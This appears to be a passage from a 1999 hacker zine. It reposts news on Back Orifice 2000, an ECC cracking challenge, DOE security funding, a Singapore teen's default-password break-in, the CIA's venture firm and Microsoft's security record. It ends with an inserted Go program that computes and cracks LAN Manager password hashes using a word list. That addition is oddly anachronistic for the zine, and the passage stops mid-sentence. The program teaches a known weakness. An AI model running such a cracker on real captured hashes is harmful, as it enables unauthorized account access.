Q: Why has BO2K acquired a reputation as only a hacker's tool?

A: Back Orifice's difference is primarily marketing spin. Since it was written by hackers, it is evil. That's wrong; pcAnywhere is just as much an evil hacking tool as Back Orifice. Not only can the client perform normal administration functions on the server's computer, but it can also do more subversive things: reboot the computer, turn the microphone or camera on and off, capture passwords.

Q: How does BO2K run in stealth mode?

A: Unless the server's owner is knowledgeable, and suspicious, he will never know that Back Orifice is running on his computer. Other remote administration tools, even SMS, also have stealth modes. Back Orifice is just better at it. Back Orifice will be used by lots of unethical people to do all sorts of unethical things.

Q: Back Orifice can't do anything until the server portion is installed on some victim's computer, right?

A: Yes. This means that the victim has to commit a security faux pas before anything else can happen.
Not that this is very hard; lots of people network their computers to the Internet without adequate protection. Still, if the victim is sufficiently vigilant, he can never be attacked by Back Orifice.

Q: What about Microsoft?

A: One of the reasons Back Orifice is so nasty is that Microsoft doesn't design its operating systems to be secure. It never has. You have to make 300-plus security checks and modifications to Windows NT to make it secure. Microsoft refuses to ship the [operating system] in that condition.

Malicious remote administration tools are a major security risk. What Back Orifice has done is made mainstream computer users aware of the danger. There are certainly other similar tools in the hacker world, some developed with much more sinister purposes in mind.

Microsoft responds to security threats only if they are demonstrated. Explain the threat in an academic paper and Microsoft denies it; release a hacking tool like Back Orifice and suddenly they take the vulnerability seriously.

For more enterprise computing news, visit Computerworld Online.

Story copyright 1999 Computerworld Inc. All rights reserved.

@HWA

22.0 97bit ECC Stronger than 512bit RSA
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by no0ne

A group of international researchers, using approximately 195 computers from all over the world, after 40 days of computation, has been awarded 1st prize in the latest round of the Certicom ECC Challenge for successfully recovering a 97-bit ECC key. Results bolster Certicom, ANSI X9, and NIST's recommendation that strong security can only be achieved by using a minimum of a 163-bit ECC key. Furthermore, result data proves that the 97-bit ECC is harder to crack compared to the 512-bit RSA which can still be found on many commercial products today.
Computer World
http://www.computerworld.com/home/news.nsf/all/9909282ellip

(Online News, 09/28/99 12:00 PM)

Global team cracks crypto challenge
By Stacy Collett

An Irish mathematician and his team have cracked the seventh and toughest encryption problem as part of a challenge by Canadian firm Certicom Corp. to prove that one type of encryption is tougher to break than another. The challenge involved 97-bit elliptic curve cryptography vs. 512-bit RSA (Rivest-Shamir-Adleman), a more common encryption method.

The solution was discovered by 195 volunteers in 20 countries after 40 days of calculations on 740 computers, Irish mathematician Robert Harley said in a statement.

Solving the problem used approximately 16,000 MIPS-years of computing, twice as much as solving a 512-bit RSA problem, officials said. One MIPS-year is the computing power of one system that can crunch a million instructions per second running for a full year.

The team concluded that the elliptic curve encryption was tougher to crack, but debate continues within the security community on the issue.

Certicom launched a series of increasingly difficult cryptography problems in November 1997 with prizes worth up to $100,000.

Andrew Odlyzko, head of mathematics and cryptography research at AT&T Labs said the test "demonstrates the need to keep increasing cryptographic key sizes to protect against growing threats."

@HWA

23.0 DOE Loses Dough to Budget Cut
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by Ted

An energy appropriations bill passed yesterday by the Senate omits $35 million requested by the Department of Energy for cyber Security. The $35 mil was to be used for real time intrusion detection for 70 Energy Department sites. Members of the Senate said they want management reform first, then they will approve funding.
Washington Post
http://www.washingtonpost.com/wp-srv/WPcap/1999-09/29/007r-092999-idx.html

DOE Loses $35 Million for Cyber Security

By Walter Pincus and Vernon Loeb
Washington Post Staff Writers
Wednesday, September 29, 1999; Page A18

The Senate yesterday passed an energy appropriations bill that omits $35 million requested by Energy Secretary Bill Richardson for increased computer security. The money was eliminated despite months of heated debate over suspected Chinese espionage, during which leading Republicans accused the Clinton administration of foot-dragging on security.

Richardson, traveling overseas, issued a statement charging that Congress was withholding "important tools needed to implement security reform" that Congress itself had demanded. Without the $35 million, Richardson said, "it will be impossible to provide real-time cyber intrusion detection and protection for 70 Energy Department sites."

The money was eliminated by a House-Senate conference reconciling differences between the initial versions of the bill passed by the two chambers. A member of the conference committee, who requested anonymity, said the $35 million was eliminated because members "want to see management reform" before they approve a huge funding increase.

The committee member noted that Richardson is developing a $450 million cyber security proposal for fiscal 2001. It would include money to replace all personal computers used in classified programs with machines that do not have floppy disk drives, and thus cannot easily be downloaded.

Congress's action leaves the department with the $2 million it originally sought for computer security before suspected Chinese espionage came to dominate political debate in Washington last spring.
Cyber security, in particular, became a major concern after it was discovered that the government's prime espionage suspect at the Los Alamos National Laboratory, Chinese American physicist Wen Ho Lee, had downloaded classified information to his unclassified computer. Lee, who denies passing secrets to China, was fired but has not been charged with any crime. Meanwhile, the Energy Department's director of counterintelligence, Edward J. Curran, acknowledged yesterday that he recommended his brother, a retired police detective, for a $70-an-hour temporary job reviewing counterintelligence operations at the department's three nuclear weapons laboratories. But he said the department's inspector general determined that his recommendation did not violate federal conflict-of-interest statutes. "I recommended my brother, yes, but he does not work directly for me," Curran said. Michael Curran, a veteran of 27 years as a detective for the Waterfront Commission of New York Harbor, has participated in a two-week counterintelligence inspection at Lawrence Livermore Laboratory National Laboratory in California and is now part of a nine-member team reviewing security at the Los Alamos lab in New Mexico. All told, he will work about six weeks this fall, Edward Curran said, and will participate in additional counterintelligence inspections at Energy Department facilities next year. © Copyright 1999 The Washington Post Company @HWA 24.0 California Proposes Email Eavesdropping Law ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Simple Nomad Currently most employers can read their employee's email, with very few considering the privacy of their employees. California Governor Gray Davis is considering a bill that would require a company to have a written policy regarding email eavesdropping before the employer can actually read their employee's email. 
San Francisco Examiner

http://199.97.97.16/contWriter/cnd7/1999/09/28/cndin/8639-0375-pat_nytimes.html

these guys have some funky shit html so I couldn't (easily) copy it here - Ed

@HWA

25.0 Singaporean Boy Sentenced to 12 Months
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by no0ne

12 months probation and 100 hours of community service was the penalty imposed
on a 15 year old boy who electronically broke into the internet site of the
"Television Corporation of Singapore". The Myanmar citizen is believed to be
the first one to appear in a Singaporean court for such an offense. The
break-in occurred last June when the boy saw a TV ad showing the TV company's
web site address and tried various usernames and passwords in an effort to get
into the firm's server. He got in using "news" for both fields. (Someone
should punish the admin of the site as well for having such crappy security.)

The Straits Times

http://straitstimes.asia1.com/cyb/cyb4_0929.html

SEP 29 1999

Teen sentenced for hacking into TCS site

By KAREN WONG

A 15-YEAR-OLD boy was sentenced to 12 months' probation and 100 hours of
community service by the Juvenile Court yesterday for hacking into the
Television Corporation of Singapore's (TCS) Internet site in June this year.

The boy, who cannot be named, is believed to be the first juvenile here to
appear in court for such an offence.

His case came up on the same day The Straits Times reported that another TCS
website had been hacked into early on Monday morning. The culprit in the
second hacking has not been caught yet.

District Judge Mark Tay Swee Keng stressed that the court took a serious view
of such cases.

However, in view of the boy's background -- he neither drinks alcohol, smokes
nor takes drugs, and also does not keep late hours -- a bond would not be
imposed on his parents.

His father is a product engineer and his mother is a housewife. Both were in
court yesterday.

The judge did not impose any curfew on the boy, who goes to a neighbourhood
school. He said the parents were already ensuring that he got home by 6 pm.

The court heard that TCS had asked the boy to apologise in writing and the
apology has been posted on the TCS site.

Last month, the boy, a Myanmar national, had pleaded guilty to four counts of
unauthorised entry and password disclosure.

The court had earlier heard that on June 15 this year, the Secondary 2 boy was
watching TV at home when he saw an advertisement showing the address
www.mediacity.com.sg

He decided to visit the website and then tried various user names and
passwords to get into the Mediacity server. He succeeded when he used "news"
as the user name and password. He then started exploring the directories and
files.

Then he told an 18-year-old youth whom he had met chatting on the Internet
that the server had security weaknesses and gave him the password. The older
boy, an O-level student in a private school, logged on too.

The younger boy then found a file containing all the authorised user names and
their corresponding encrypted passwords. He passed them on to the older boy
and both used them.

The court heard that the younger boy only browsed through the site. The older
boy's case is pending.

Due to the hacking, TCS, which reported that some of its pages had been
replaced by pages containing obscene words, had to shut the server down for
about 10 hours. About 80 man-hours went into restoring the site.

@HWA

26.0 CIA Funds Startup VC Firm
     ~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by Weld Pond

Congress has appropriated $28 million to fund a venture capital firm with the
name of 'In-Q-It'. The firm will use the money to invest in small high-tech
companies who are working on promising technological projects that could
benefit the CIA.
The new corporation will be completely independent of the CIA and will be
headed by Gilman Louie, founder of MicroProse and ex-executive of Hasbro.

Nando Times

http://www.techserver.com/noframes/story/0,2294,500039359-500063830-500088357-0,00.html

Wired

http://www.wired.com/news/news/politics/story/22004.html

CIA sets up firm to invest in intelligence technologies

Copyright © 1999 Nando Media
Copyright © 1999 Associated Press

By TOM RAUM

WASHINGTON (September 29, 1999 12:09 p.m. EDT http://www.nandotimes.com) - The
CIA, not wanting to miss the boat on the Internet age or be outsmarted by
tech-savvy adversaries, is teaming up with Silicon Valley entrepreneurs to
invest in companies developing computer technologies that could help with
intelligence gathering.

Forgoing its usual clandestine ways, the agency has set up its own venture
capital firm - with money appropriated by Congress - with offices in
Washington and Palo Alto, Calif. It will invest in promising new start-up
hi-tech companies.

The CIA picked a fanciful name for the new company: In-Q-It. The "In" stands
for intelligence. The "It" stands for information technology. And the Q?
That's the code name of the James Bond character who comes up with all the
gadgets that the fictional British spy uses.

"We do have a sense of humor," Central Intelligence Agency spokesman Bill
Harlow said Wednesday, confirming the existence of the new company.

Harlow said the venture capital company "is clearly tied to us, but they make
a big point of being independent."

The venture, first reported by The Washington Post and The New York Times in
Wednesday's editions, was actually set up last February as a nonprofit
organization. But it is just now getting organized, with its own board of
directors, according to the new chief executive officer, Gilman Louie.

Louie said in an interview that the company would be small, with about 20 to
25 employees, and is being started with $28 million appropriated by Congress
last year as part of the classified budget for the agency.

Both Louie and the CIA said the venture capital company would only work on
unclassified projects.

Mainly, In-Q-It will invest in some high-tech companies and form joint
ventures with other ones where the companies are working on promising
technological projects that could benefit the CIA. This includes ways of
helping the CIA to use the Internet more effectively and securely.

It also will try to find promising technologies that will help the CIA better
use the information it already possesses in a variety of forms, from paper to
computer files.

He cited the May 7 bombing of the Chinese embassy in Yugoslavia - a target
picked by the CIA - as "the manifestation of the worst result that could
happen if you don't have all your information lined up."

Louie, 39, founded his own electronic game company - MicroProse Inc. - that
was later bought by Hasbro. At Hasbro, Louie has been an executive with the
toy company's online business group. He said he has no experience in
espionage "and I want to keep it that way."

The company's board of directors includes John Seely Brown, director of the
Xerox Corporation's Palo Alto Research Center; Norm Augustine, chairman of
Lockheed Martin; William Perry, the former defense secretary; and Jeong Kim
of Lucent.

Wired;

Valley VCs to CIA: 'Huh?'

by James Glave

12:30 p.m. 29.Sep.99.PDT

The CIA's new venture capital project isn't going to come up with anything
that the free market won't do on its own.

That's the opinion of venture capitalists and policy watchers, some of whom
lampooned a new effort to develop spy technology in the heart of
regulation-wary Silicon Valley.

"I am not familiar with what it costs to create those exploding pens,"
Benchmark Capital general partner Kevin Harvey said.

The New York Times reported Wednesday that the new, non-profit VC company,
In-Q-It, will be bankrolled with US$28 million appropriated for the spy
agency's budget. There is already one office in Washington, with another
planned for Northern California.

But the tech venture capital community said that the plan is right out of a
movie.

"That's R and D that is pretty far afield from what we do here," Harvey said,
adding that government involvement in venture capital is "not a great idea."

In-Q-It CEO Gilman Louie, a veteran of the computer game and toy industry,
told the newspaper that the new company is designed to move information
technology to the agency more quickly than traditional government procurement
processes allow.

Neither Louie nor the CIA could be reached for comment.

Meanwhile, VCs and policy watchers scoffed at the arrangement.

"It looks pretty outrageous when we have healthy capital markets and one of
the most innovative technology sectors in the world," Erick Gustafson,
technology policy director at the free-market focused Citizens For a Sound
Economy, said.

"If you have $28 million, do you put it in using the CIA as the manager, or
do you use private existing means of research? The existing means of research
would prove more efficient," Gustafson said.

The CIA's new company aims to cut through the sluggish technology procurement
process by directly funding companies that are creating new innovations in
the fields of privacy and security.

But one VC said that the agency should stick to the current scheme of
contracting out for products.

"It seems like they would only add layers to [the procurement bureaucracy],"
said Gregory Barr of Fleet Equity Partners.

"It doesn't seem to make a lot of sense," he said, adding that the
arrangements could set up all manner of conflicts of interest between
investor and developer.

Barr said that Louie, who has already left his position as a Hasbro
executive, may not have been the best choice for the job.

"If you are looking for a successful VC, I am not sure someone from a toy
company is the best person. [Louie] is someone from the product side, not the
investment side," he said.

Andrew Anker, a partner with August Capital, described the project as
interesting but misdirected.

"There is a huge glut of money out there," Anker said. "And there are a lot
of ideas out there. The question is more, 'What does the marketplace want?'"

"Say the CIA said that wrist phones are critical for our agents and we will
buy 10,000 of them. As long as there is a consumer market for it, a bunch of
entrepreneurs will go down to Sand Hill Road and seek financing to get it."

@HWA

27.0 BO2K, NetBus, and now WinWhatWhere
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by Weld Pond

So what exactly are the features of a remote admin tool that cause it to be
labeled as malicious by AntiVirus vendors? WinWhatWhere, which was actually
built to spy on people, avoids this hapless moniker while commercial software
such as NetBus and freeware such as BO2K get branded as evil malicious code.
What the hell is going on here?

ZD Net

http://www.zdnet.com/zdnn/stories/comment/0,5859,2343782,00.html

--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

A bevy of Backdoor bad boys

By Kevin Poulsen, ZDTV
September 29, 1999 10:29 AM PT
URL: http://www.zdnet.com/zdnn/stories/comment/0,5859,2343782,00.html

Before flying to DC to cover InfowarCon '99 last month, I took a few minutes
to download the dread Back Orifice 2000, and then actually installed the
malevolent masterpiece of cyberhorror on my home PC, blatantly ignoring the
advice of various security advisories and my antivirus software.

As you probably know by now, Back Orifice 2000 -- BO2K to its friends -- is an
evil program that cyberterrorists can use to take complete control of your
computer. They can read your email, wipe out your hard drive, or send your
mouse cursor careening around your screen like the planchette on a
demon-haunted Ouija board. Villains can send the program as an email
attachment to their enemies -- perhaps disguised as an electronic greeting
card or a game. If the hapless victim opens the attachment, all is lost.

But there's another side to BO2K. If you're a network administrator, the
program is well suited for maintaining the computers on your network. If
you're the family computer expert, you can send it to your parents and use it
to fix whatever minor Windows problems are vexing them this week. If you're
leaving town, you can install it on your own machine and use it to check in
on your PC: transfer a file that you forgot to bring with you, or capture
frames from your Netcam and watch the people burglarizing your apartment. In
short, BO2K is actually a useful and free remote administration tool.

The program gained its dark image primarily from the showmanship of its
creators: the cyberspace bad boys (and gal) known collectively as "The Cult
of the Dead Cow." They released BO2K, not in a dry corporate environ, but in
a flashy concert-like venue at the DefCon hacker convention. And the rock
stars of the underground taunt Microsoft and antivirus companies at every
turn.

Meanwhile, another "evil" program is struggling to become mainstream. NetBus
was created last year by Swedish programmer Carl Fredrik Neikter, and it was
originally designed for mischievous fun -- install it on a friend's machine
and watch his amazement via his Netcam while you remotely open and close his
CD-ROM tray. It became an underground hit even before the original Back
Orifice made its high-profile appearance. But Neikter never wanted to be a
rebel.

Now, partnered with UltraAccess Networks, he's marketing a new version of his
program as commercial shareware, and struggling to shake the underground
image. Sadly, even charging for the software -- a sure sign of legitimacy --
hasn't completely removed the cyberpunk taint from NetBus's reputation.
Virtually all the major antivirus software makers -- some of whom sell their
own remote administration tools -- treat the $15 program as malicious code, a
practice UltraAccess founder Judd Spence calls anticompetitive. "Basically,"
said Spence, "we're probably going to have to take everyone to court."

Last March, NetBus scored a prestigious "five cow" rating from TUCOWS, only
to be yanked from the software distributor's website a few days later after
complaints came in about their distribution of malicious code.

Oddly enough, software intended for genuinely evil purposes doesn't seem to
be as controversial. Earlier this month, a company called WinWhatWhere
released version 2.0 of its Investigator software, a program specifically
designed to spy on hapless PC users. It can record every keystroke a user
types and, according to the company's press release, includes "an optional
Silent Install utility for [sic] discrete deployment."

How has Investigator eluded the dire warnings and countermeasures that
accompany Back Orifice and NetBus? It is targeted specifically to companies
who want to spy on their employees. It seems that's something that just
doesn't warrant a security advisory.

@HWA

28.0 Microsoft, Insecure or Just More Prevalent?
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by Elinor

With the recent holes found in IE, Hotmail, NT, Office and other Microsoft
products many people think that Microsoft just writes insecure code.
Microsoft says that their code is no worse than anyone else's but that what
they write is looked at by a lot more people.
(This article gives a good overview of a lot of the technical hurdles
Microsoft faces.)

CNN

http://www.cnn.com/TECH/computing/9909/28/ms.security.idg/index.html

Microsoft: Bad security, or bad press?

September 28, 1999
Web posted at: 12:12 p.m. EDT (1612 GMT)

by Elinor Mills Abreu

(IDG) -- Microsoft has been getting a lot of bad press lately over security
vulnerabilities in Internet Explorer, Office and Hotmail, among other
software. Security concerns with Windows NT even prompted the U.S. Army to
move its hacked Web site from NT servers to WebStar servers running the
MacOS.

But does this mean Microsoft software is less secure than other software? A
variety of experts think so, claiming the software giant is offering more
functionality at the expense of security. Microsoft defends its strategy,
saying users want ease-of-use and more features. And several users said they
approve of that strategy.

In the end, it's up to users to let the company know whether they are happy
with the trade-off or if they want defaults to be set for greater security
and more hand-holding. Another option users have is to switch software like
the Army did.

The Army cited the fact that the MacOS doesn't have support for remote logons
or a command shell to provide remote access via a DOS prompt. Scott Culp,
security product manager for NT Server, says NT provides tools to disable
remote logons and that nearly all Unix systems have a command shell. "Whether
or not an operating system has a remote command shell says nothing about its
ability to withstand other attacks such as denial of service attacks."

Microsoft software experiences the same types of security woes other
platforms do but its troubles are more prominent because more people are
using Microsoft products than products from other software vendors, Culp
says.

Without question, Microsoft's dominance in the operating system market plays
a big part in the headlines - the sheer number of users of the software makes
it an easy and huge target for hackers, increases the chances that security
flaws will be discovered and heightens the impact from spreading viruses.

Hegemony not the only issue

But numerous experts, analysts and hackers say Microsoft's hegemony isn't the
only problem.

"They certainly don't have a very secure environment. There are so many holes
in the Microsoft environment that any [worthy] hacker ... is going to figure
out how to break in," says Anne Thomas, a senior analyst at the Patricia
Seybold Group in Boston.

"It's the dominant operating system out there, so it's going to attract the
attention. On the other hand, Windows has extremely sloppy security," says
Bruce Schneier, author of Applied Cryptography and a founder and chief
technology officer of Counterpane Internet Security, a provider of managed
security services in Minneapolis, Minn.

What often upsets people is that Microsoft hasn't learned from the mistakes
made in older operating systems, notes Jon McCown, technical director of
network security at the International Computer Security Association in
Reston, Va. Categories of attack that are well understood are cropping up in
Windows. "They're doing a forthright job of addressing them, but there's a
concern about what we don't know about yet; what's still in the operating
system or in the servers that will become an issue."

Evolution of Windows

It has been suggested that Microsoft's security weaknesses have to do with
the evolution of Windows from a single-user desktop operating system to a
multiuser operating system. Windows is desktop software that "was never
really intended as network architecture," says Jeff Tarter, editor and
publisher of Softletter, based in Watertown, Mass.

However, Microsoft is rewriting a lot of the code for Windows 2000, as it did
for NT, which should help make it more secure, he adds.

Culp acknowledges that the NT security architecture is more "robust" than its
predecessors. "NT is an entirely different animal altogether," he says. "It
was built from the ground up with a brand new architecture ... to be used as
an enterprise class operating system with security as a primary requirement."

But Culp also defended the strength of all Windows in general, saying
security was "woven" into the operating system rather than "bolted on"
afterward.

Others are skeptical

"Microsoft's operating system was never designed with security in mind,"
Schneier says. "For Microsoft, security is always an afterthought."

One example is Microsoft's implementation of file-sharing networking services
in Windows 95 and 98, says Tweety Fish, a member of the hacker group Cult of
the Dead Cow. Where previous versions of Windows weren't designed for
networked computers, Microsoft made TCP/IP file sharing the default on
Windows 95 and 98 without explaining the consequences of sharing files over
the Internet to users who weren't savvy about network security, he wrote in
an e-mail response to questions. Microsoft could have also used a more secure
method for file sharing.

Trade-off: Security vs. functionality

Factors listed by experts interviewed over the past few weeks that lead to
security problems for Microsoft include:

-- The company's reliance on the Component Object Model specification for
running application components on multiple platforms, specifically ActiveX
controls, which are reusable component program objects similar to Java
applets and which can be attached to an e-mail or downloaded from a Web site.
The most dangerous are pre-installed ActiveX controls which contain functions
that can be executed on a computer but run without digital signatures used by
other ActiveX controls.

-- NT's "insecure" default installation, which assumes the user or network
administrator will be knowledgeable enough to change the settings to a higher
security level.

-- The company's use of executable code in data files in Microsoft Office
products, primarily macros, which are saved commands that can be recalled
with a single command or keystroke.

-- The company's tight integration of its applications with its operating
system, and lack of tight administration control in the operating system over
privileges and access controls, which allow applications and macros to
execute other programs.

-- The company's use of hidden and/or undocumented APIs or features that can
give hackers back doors into Microsoft applications and which don't get the
scrutiny of code made public to developers.

-- The company's faulty implementation of the Point-to-Point Tunneling
Protocol, which enables the extension of corporate networks through private
"tunnels" over the Internet. It is still vulnerable to "offline
password-guessing attacks from hacker tools such as L0phtcrack," according to
Schneier's report at http://www.counterpane.com/pptp.html.

In general, the experts agreed that these technologies provide greater ease
of use and functionality to users but say they also open the system up to
security vulnerabilities. Microsoft counters that many of the features can be
either disabled, like macros and ActiveX controls, or made more secure with
the use of third-party specialized software.

COM opens the door

Thomas of the Patricia Seybold Group says Microsoft's main problem has to do
with COM, which "opens the system up to all kinds of nasty, dangerous
situations." COM's integration with Microsoft Word allowed the prolific
Melissa virus to spread so quickly in March, she says.

"It's a hard trade-off," Thomas says. "You can do without this incredibly
powerful technology that makes your system so much more automatic, or you can
shut off that automatic capability and not have that tight integration, but
have protection against viruses."

Java applets are designed to minimize security violations by being executed
in a "sandbox" - a secure area of the computer that isolates Java applets and
keeps them from damaging files - whereas ActiveX controls rely on the applet
being signed by the creator, whom the user will, ideally, know and trust.

Dangers of ActiveX

Allowing remote systems to run arbitrary code on a local system is a "massive
security risk," hacker Tweety Fish wrote. "It's been proven time and time
again that Microsoft's implementation of ActiveX can be broken pretty easily
..."

ActiveX controls can be automatically launched when a user goes to an HTML
page or clicks on an e-mail attachment. They can be used to do malicious
things like run programs on a user's computer, read system files and create
files, among other things, according to Richard M. Smith, a security expert
and president of Phar Lap Software, a Cambridge, Mass. company that makes
real-time operating systems for embedded systems.

"I don't think anybody right now, frankly, has a handle on the scope of the
[ActiveX] problem," Smith says. "ActiveX really opens up a can of worms."

Microsoft has released an average of about two to three security patches a
month over the past year, Smith says, adding that he suspects that most
Microsoft users have not downloaded them. Within the past year, while
Microsoft has had about 10 separate bugs in IE that enable code in messages
to read files, Netscape has had one, according to Smith.

Default "open" or "closed"

Microsoft's Culp argued that COM does not pose a security risk, and countered
that Microsoft allows users to configure their software to give them the
balance of functionality and security.

For instance, users can disable macros and ActiveX controls, and a new
security patch for Office lets users decide whether to allow Office documents
to launch automatically when they're hosted on Web sites, he says.

In addition, a new security configuration tool kit that ships with Windows
2000 will allow users to customize their software to the security level they
desire, Culp says. "We don't force anybody into a particular stance," he
says. "We provide tools to allow you to make that decision."

But several experts say Microsoft should ship its software in the highest
security mode rather than a more risky "open" default.

"The operating system should be fail safe enough [especially on a server
operating system like NT] that a nonadministrator user has to work pretty
hard to allow the machine to be compromised," hacker Tweety Fish wrote. "The
fact that macros in Microsoft Word can run any DOS executable and access any
system function is a massive security hole, and for Microsoft to claim
anything else is specious marketing spin."

Users can't make knowledgeable choices of what features to disable if they
don't fully understand the dangers involved, Tweety Fish says. Instead, they
should feel confident that their software is secure and as they start to
understand the risks they can modify the security themselves.

Eric Schultze, director of Microsoft Content for Security-Focus, which
operates a portal site at http://www.securityfocus.com, specifically
complained that Windows NT's default installation can allow hackers to get a
lot of information, including access to "blank administrator passwords,
disabled security policies, and weak permissions over critical system files."

But Microsoft can't be expected to make the security decisions for its users,
particularly when opting for greater security for some users at the expense
of less functionality for others, Culp argues. "There's always a trade-off
between convenience and security," he says. "Everybody has a proper point
where they balance security against usability. Any two people are going to
have a different point that's right for them."

Virtually all general-purpose operating systems default to usability over
security rather than in a "locked down" mode.

Russ Cooper, editor of the NT Bugtraq mailing list (www.securityadvice.com),
defended macros. "Although relatively insecure, [macros are] still very much
in demand. ... Internet technologies are not designed to be secure. They're
designed to be interactive."

Cooper says users should be more responsible. "Microsoft is providing us with
tools that will help us, but at the same time we as consumers are not taking
the responsibility ... to learn basics about using this stuff," he says.

But other experts argue that Microsoft has a responsibility to provide
greater user safety than it is now, even if it might take more time and money
to develop products that are more secure.

"In the car industry they have to build with safety in mind. Car makers
couldn't get away with this," said Avi Rubin, a principal member of the
technical staff at AT&T Labs in Florham Park, N.J., and author of The Web
Security Sourcebook. "They're more concerned with the bottom line and
profits, and that's upsetting."

"Setting the default to dangerous doesn't work in any other industry,"
Schneier of Counterpane says.

Business decision

Offering zero-administration capabilities and features that, in their default
mode, reduce the level of security in the software, is a strategic decision
on Microsoft's part, the experts say.

Phar Lap's Smith questioned the need for some of the features Microsoft
provides at the expense of security, saying he'd like to turn them off but
doesn't always get that option.

To simplify things for the administrator, Microsoft is promoting ease-of-use
over "robustness of control," hacker Tweety Fish says. However, if the
operating system doesn't adequately handle the behind-the-scenes work,
security holes can be opened up without the administrator's awareness.

"Unix variants have a long way to go to match the ease of use of NT, but on
the other hand, with a little bit of knowledge [in Unix], you can know
EXACTLY what your machine is doing, which is the most important aspect of
server administration," Tweety Fish wrote.

Meanwhile, Schultze of Security-Focus predicted that security problems with
NT and its predecessors will pale in comparison to security issues that will
arise with Windows 2000, which will offer more complexity to secure. "There
will be more opportunities for things to go wrong," he says.

For instance, Schultze says Windows 2000 defaults to enabling a host of
encryption authentication schemes, including LanMan, which he says is easy to
decrypt, and users have to go in and disable any schemes they don't want to
use. However, the chances that an administrator won't tighten the system down
are great.

Culp disputes this, noting that in Windows 2000 Microsoft is using security
standards like the Kerberos protocol, putting the software to heavy testing
including specific attempts to break into it, and has been beta testing it
for two years.

Tight integration, loose administration, hidden APIs

Microsoft prides itself on the tight integration of its applications with its
operating system - a matter that sparked an antitrust lawsuit by the U.S.
government. But while this integration lets users easily work between the
programs, it also makes it easy for flaws in one application to affect the
entire system, according to Rubin at AT&T.

"There are no security perimeters around any of the applications," he says.
"The fact that Word macros can access an Excel database and Excel files can
launch other programs with a 'call function'" in Outlook, for example,
creates a hacker-friendly environment.
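Two of the complaints in this article come down to the same object: the PPTP
item (MS-CHAP responses open to "offline password-guessing attacks from
hacker tools such as L0phtcrack") and Schultze's remark that LanMan is "easy
to decrypt" are both about the LAN Manager password hash. The Go program
below is an added example for this zine, not code from the article, from
Microsoft or from L0phtcrack. It computes the LM hash the way Windows does
(upper-case, NUL-pad to 14 bytes, DES-encrypt the constant "KGS!@#$%" under
each 7-byte half) and then attacks each half on its own against a small
constructed word list; the word list, the sample passwords and the helper
names are assumptions made here for illustration.

```go
package main

import (
	"bytes"
	"crypto/des"
	"encoding/hex"
	"fmt"
	"strings"
)

// lmMagic is the fixed 8-byte plaintext LM encrypts under each half of the password.
var lmMagic = []byte("KGS!@#$%")

// desKeyFrom7 spreads 56 key bits over 8 bytes, leaving the low bit of each byte
// for parity. DES ignores the parity bit and Go's crypto/des does not check it.
func desKeyFrom7(k7 []byte) []byte {
	key := []byte{
		k7[0] >> 1,
		(k7[0]&0x01)<<6 | k7[1]>>2,
		(k7[1]&0x03)<<5 | k7[2]>>3,
		(k7[2]&0x07)<<4 | k7[3]>>4,
		(k7[3]&0x0F)<<3 | k7[4]>>5,
		(k7[4]&0x1F)<<2 | k7[5]>>6,
		(k7[5]&0x3F)<<1 | k7[6]>>7,
		k7[6] & 0x7F,
	}
	for i := range key {
		key[i] <<= 1
	}
	return key
}

// lmHalf encrypts the magic constant under one 7-byte half of the padded password.
func lmHalf(k7 []byte) []byte {
	block, err := des.NewCipher(desKeyFrom7(k7))
	if err != nil {
		panic(err) // cannot happen: the key is always 8 bytes
	}
	out := make([]byte, 8)
	block.Encrypt(out, lmMagic)
	return out
}

// pad14 upper-cases the password and truncates or NUL-pads it to 14 bytes.
func pad14(password string) []byte {
	pw := []byte(strings.ToUpper(password))
	if len(pw) > 14 {
		pw = pw[:14]
	}
	return append(pw, make([]byte, 14-len(pw))...)
}

// lmHash returns the 16-byte LAN Manager hash: two independent DES outputs.
func lmHash(password string) []byte {
	pw := pad14(password)
	return append(lmHalf(pw[:7]), lmHalf(pw[7:])...)
}

// emptyHalf is LM of an all-NUL half (AAD3B435B51404EE).
var emptyHalf = lmHalf(make([]byte, 7))

// isAtMostSevenChars reports whether the second half is the empty-half constant,
// i.e. the password is 7 characters or shorter. No cracking needed for that leak.
func isAtMostSevenChars(hash []byte) bool {
	return bytes.Equal(hash[8:], emptyHalf)
}

// crackLM attacks each half independently: candidate halves are hashed once into
// a lookup table, then both halves of the target are looked up. Because the two
// halves never interact, a 14-character password costs at most two 7-character
// searches, and case is lost entirely (the recovered string is upper-case).
func crackLM(target []byte, words []string) (string, bool) {
	table := map[string][]byte{}
	addHalf := func(h []byte) { table[string(lmHalf(h))] = h }
	for _, w := range words {
		pw := pad14(w)
		addHalf(pw[:7])
		addHalf(pw[7:])
	}
	// Tiny brute force for the common case of a one-character second half.
	for c := byte('A'); c <= 'Z'; c++ {
		addHalf(append([]byte{c}, make([]byte, 6)...))
	}
	for c := byte('0'); c <= '9'; c++ {
		addHalf(append([]byte{c}, make([]byte, 6)...))
	}
	first, ok1 := table[string(target[:8])]
	second, ok2 := table[string(target[8:])]
	if !ok1 || !ok2 {
		return "", false
	}
	joined := append(append([]byte{}, first...), second...)
	return string(bytes.TrimRight(joined, "\x00")), true
}

func main() {
	// Constructed sample inputs, not taken from the article.
	for _, pw := range []string{"", "letmein", "password"} {
		h := lmHash(pw)
		fmt.Printf("LM(%q) = %s  <=7 chars: %v\n", pw, hex.EncodeToString(h), isAtMostSevenChars(h))
	}
	// "password" itself is deliberately absent from the list: "PASSWOR" comes
	// from the list entry "passwor" and "D" from the one-character brute force.
	got, ok := crackLM(lmHash("password"), []string{"letmein", "passwor", "sunshine"})
	fmt.Printf("cracked: %q (%v)\n", got, ok)
}
```

The second half of any password of seven characters or fewer is the constant
AAD3B435B51404EE, so an attacker learns the length class before doing any
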